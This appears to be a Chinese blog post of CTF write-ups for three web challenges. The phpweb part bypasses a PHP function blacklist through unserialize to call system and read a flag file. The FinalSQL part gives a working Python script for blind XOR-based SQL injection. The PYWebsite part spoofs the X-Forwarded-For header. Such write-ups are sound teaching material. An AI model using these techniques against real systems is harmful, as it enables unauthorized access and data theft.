[网鼎杯 2020 朱雀组]phpweb
f12发现有post数据
hackbar看一下
是call_user_func()函数,用file_get_contents读取一下index.php
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>
禁用了一大堆函数,这里用序列化绕过
找了各种目录没找到,最后不得已用find来找
<?php
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$a=new Test();
//$a->p='find / -name "*flag*"'
$a->p='cat /tmp/flagoefiu4r93';
$a->func='system';
print_r($a);
print_r(urlencode(serialize($a)));
[极客大挑战 2019]FinalSQL
打开之后登陆无果,然后在另一个页面发现注入,最后发现异或注入可用,(1^1^1=1,1^0^1=0)
上脚本吧
import requests as res
import time
url='http://89f27319-5436-4c7b-ae35-3b038bfdb4e2.node3.buuoj.cn/search.php?id='
rs=''
for i in range(1,50):
high =127
low = 32
mid = (high+low)/2
while(high>low):
payload='1^(ascii(substr((select(group_concat(password))from(F1naI1y)where(username=\'flag\')),%d,1))>%d)^1'%(i,mid)
#payload='1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'F1naI1y\')),%d,1))>%d)^1'%(i,mid)
r=res.get(url+payload)
time.sleep(1)
print(payload)
if 'NO! Not this! Click ot' in r.text:
low=mid+1
else :
high=mid
mid=(high+low)/2
rs+=chr(int(mid))
print("[+]:",rs)
找出来表里有Id,username,password然后username里有个flag,那么读他的密码就行了,这里记得加延时,不然会因为请求太快被ban
[MRCTF2020]PYWebsite
buy it now 扫码购买,他不给我让我好好想想,气抖冷
function enc(code){
hash = hex_md5(code);
return hash;
}
function validate(){
var code = document.getElementById("vcode").value;
if (code != ""){
if(hex_md5(code) == "0cd4da0223c0b280829dc3ea458d655c"){
alert("您通过了验证!");
window.location = "./flag.php"
}else{
alert("你的授权码不正确!");
}
}else{
alert("请输入授权码");
}
}
源码发现验证方式,打开/flag.php他说是验证ip的于是直接加个xxf头127.0.0.1成功